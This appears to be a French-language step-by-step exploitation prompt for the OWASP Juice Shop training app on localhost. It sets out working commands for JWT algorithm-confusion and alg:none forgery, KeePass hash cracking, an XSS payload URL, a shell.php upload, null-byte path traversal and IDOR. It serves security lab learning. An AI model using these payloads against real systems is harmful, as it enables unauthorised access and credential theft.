================================================================================
        OWASP JUICE SHOP — PROMPT D’EXÉCUTION GUIDÉ (FORMAT CONSOLE)
        MODE: HUMAIN + EXEMPLES DE COMMANDES
================================================================================

CONTEXTE :
Tu es en phase d’exploitation progressive. Les commandes ci-dessous sont
DES EXEMPLES UNIQUEMENT. À chaque étape, tu dois comprendre CE QUE TU FAIS
avant d’exécuter quoi que ce soit.

================================================================================
[ETAPE 1] RÉCUPÉRATION DE CLÉS EXPOSÉES (ERREUR DE CONFIGURATION)
================================================================================

Objectif :
Vérifier si l’application expose des clés cryptographiques accessibles sans
authentification. Ces clés peuvent être réutilisées pour forger des tokens.

Exemple de commande (téléchargement d’une clé privée ou sensible exposée) :

curl -s http://localhost:3000/encryptionkeys/premium.key -o premium.key

Cette commande illustre comment un fichier sensible peut être récupéré
directement depuis le serveur si aucun contrôle d’accès n’est appliqué.

================================================================================
[ETAPE 2] PRÉPARATION DE L’ENVIRONNEMENT LOCAL
================================================================================

Objectif :
Organiser un environnement de travail local pour stocker les artefacts,
scripts et fichiers nécessaires à l’analyse.

Exemple de commandes :

cd ~/pentest-lab

curl -o jwt.pub http://localhost:3000/encryptionkeys/jwt.pub
ls -l jwt.pub

Ici, on simule la récupération d’une clé publique JWT, souvent utilisée
côté serveur pour vérifier les signatures… mais parfois mal utilisée.

================================================================================
[ETAPE 3] FORGER UN JWT VIA CONFUSION D’ALGORITHME (RS256 → HS256)
================================================================================

Objectif :
Tester une mauvaise implémentation JWT où une clé publique RSA est acceptée
comme secret HMAC, permettant de signer un token arbitraire.

Exemple de génération de token (script Node.js) :

TOKEN=$(node << 'EOF'
const jwt = require("jsonwebtoken")
const fs = require("fs")

// Exemple : clé publique utilisée à tort comme secret
const pub = fs.readFileSync("jwt.pub")

const token = jwt.sign(
  {
    data: {
      email: "rsa_lord@juice-sh.op"
    }
  },
  pub,
  {
    algorithm: "HS256",
    header: {
      kid: "jwt.pub"
    }
  }
)

process.stdout.write(token)
EOF
)

echo "[+] TOKEN généré :"
echo "$TOKEN"

Cette étape illustre une attaque de type **JWT Algorithm Confusion**.

================================================================================
[ETAPE 4] TEST D’ACCÈS À DES ENDPOINTS ADMIN AVEC TOKEN FORGÉ
================================================================================

Objectif :
Vérifier si le token forgé permet l’accès à des endpoints réservés aux
administrateurs.

Exemples de commandes :

curl -i \
  -H "Authorization: Bearer $TOKEN" \
  http://localhost:3000/rest/admin/application-configuration

curl -i \
  -H "Authorization: Bearer $TOKEN" \
  http://localhost:3000/rest/admin/whoami

Ces requêtes servent à confirmer une élévation de privilèges effective.

================================================================================
[ETAPE 5] DÉCOUVERTE D’INFORMATIONS PUBLIQUES SENSIBLES
================================================================================

Objectif :
Explorer les fichiers ou endpoints publics susceptibles de révéler des
informations internes (emails, logs, versions, métriques).

Exemples de commandes :

curl http://localhost:3000/.well-known/security.txt
curl http://localhost:3000/support/logs/access.log.2025-12-27

curl http://localhost:3000/metrics
curl http://localhost:3000/actuator/metrics

Ces ressources sont souvent oubliées en production et riches en données.

================================================================================
[ETAPE 6] ANALYSE DE FICHIERS CHIFFRÉS OU OBFUSQUÉS
================================================================================

Objectif :
Récupérer un fichier chiffré ou encodé et effectuer une analyse statistique
simple pour identifier des patterns.

Exemples de commandes :

curl http://localhost:3000/ftp/announcement_encrypted.md > enc.txt
wc -l enc.txt
sort enc.txt | uniq -c | sort -nr | head

Cela permet de détecter des répétitions typiques d’un chiffrement faible.

================================================================================
[ETAPE 7] PRÉPARATION D’OUTILS DE CRACKING & FORENSIC
================================================================================

Objectif :
Installer les outils nécessaires à l’analyse de bases KeePass, hashes et
wordlists.

Exemples de commandes :

sudo apt update
sudo apt install -y keepassxc john python3 python3-pip kpcli

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

Ces outils sont utilisés uniquement à titre d’illustration pédagogique.

================================================================================
[ETAPE 8] EXTRACTION & ATTAQUE D’UNE BASE KEEPASS
================================================================================

Objectif :
Extraire un hash KeePass et tenter une récupération de mot de passe à partir
d’un dictionnaire ou de règles ciblées.

Exemples de commandes :

keepass2john incident-support.kdbx > support.hash
john --show support.hash

Cela simule une fuite de coffre-fort de mots de passe interne.

================================================================================
[ETAPE 9] AUTOMATISATION DE DUMP DE SECRETS KEEPASS
================================================================================

Objectif :
Illustrer comment un attaquant pourrait automatiser l’extraction d’entrées
une fois le mot de passe connu.

Exemple (script expect simplifié) :

chmod +x kp_dump_dynamic.exp
./kp_dump_dynamic.exp

Cette étape montre l’impact réel d’un mot de passe compromis.

================================================================================
[ETAPE 10] AUTHENTIFICATION AVEC IDENTIFIANTS COMPROMIS
================================================================================

Objectif :
Valider qu’un secret récupéré permet une authentification réelle sur
l’application.

Exemple de commande :

curl -i -X POST http://localhost:3000/rest/user/login \
  -H "Content-Type: application/json" \
  -d '{
    "email": "support@juice-sh.op",
    "password": "EXEMPLE_DE_MOT_DE_PASSE"
  }'

================================================================================
[ETAPE 11] EXPLOITATION XSS (EXEMPLE VISUEL)
================================================================================

Objectif :
Vérifier si un champ de recherche ou de routing client est vulnérable à une
injection XSS DOM ou réfléchie.

Exemple d’URL :

xdg-open "http://localhost:3000/#/search?q=<iframe src=\"javascript:alert(`xss`)\">"

================================================================================
[ETAPE 12] JWT SANS SIGNATURE (alg:none)
================================================================================

Objectif :
Tester si l’application accepte des JWT sans signature cryptographique.

Exemple de construction manuelle :

TOKEN="$(printf '{"alg":"none","typ":"JWT"}' | base64 -w0 | tr -d '=')\
.$(printf '{"data":{"email":"jwtn3d@juice-sh.op"}}' | base64 -w0 | tr -d '=')."

curl http://localhost:3000/rest/user/whoami \
  -H "Authorization: Bearer $TOKEN"

================================================================================
[ETAPE 13] UPLOAD DE FICHIERS & TESTS DE LIMITES
================================================================================

Objectif :
Tester les contrôles de taille, de type et de contenu sur l’upload de fichiers.

Exemples de commandes :

dd if=/dev/zero of=bigfile.pdf bs=1K count=150
curl -X POST http://localhost:3000/file-upload \
  -F "file=@bigfile.pdf"

echo "test" > shell.php
curl -X POST http://localhost:3000/file-upload \
  -F "file=@shell.php"

================================================================================
[ETAPE 14] PATH TRAVERSAL & NULL BYTE
================================================================================

Objectif :
Tester les protections contre la traversée de répertoires et l’encodage
malveillant.

Exemple de commande :

curl "http://localhost:3000/ftp/legal.md%2500.pdf"

================================================================================
[ETAPE 15] IDOR AVEC TOKEN COMPROMIS
================================================================================

Objectif :
Vérifier si un utilisateur peut accéder à des ressources appartenant à
d’autres comptes.

Exemple de commande :

curl http://localhost:3000/rest/basket/3 \
  -H "Authorization: Bearer $TOKEN"

================================================================================
FIN DU PROMPT
RAPPEL :
- Les commandes sont des EXEMPLES
- Chaque action doit être comprise avant exécution
- Toujours raisonner en CHAÎNE (JWT → IDOR → ADMIN → LOGIC)
================================================================================
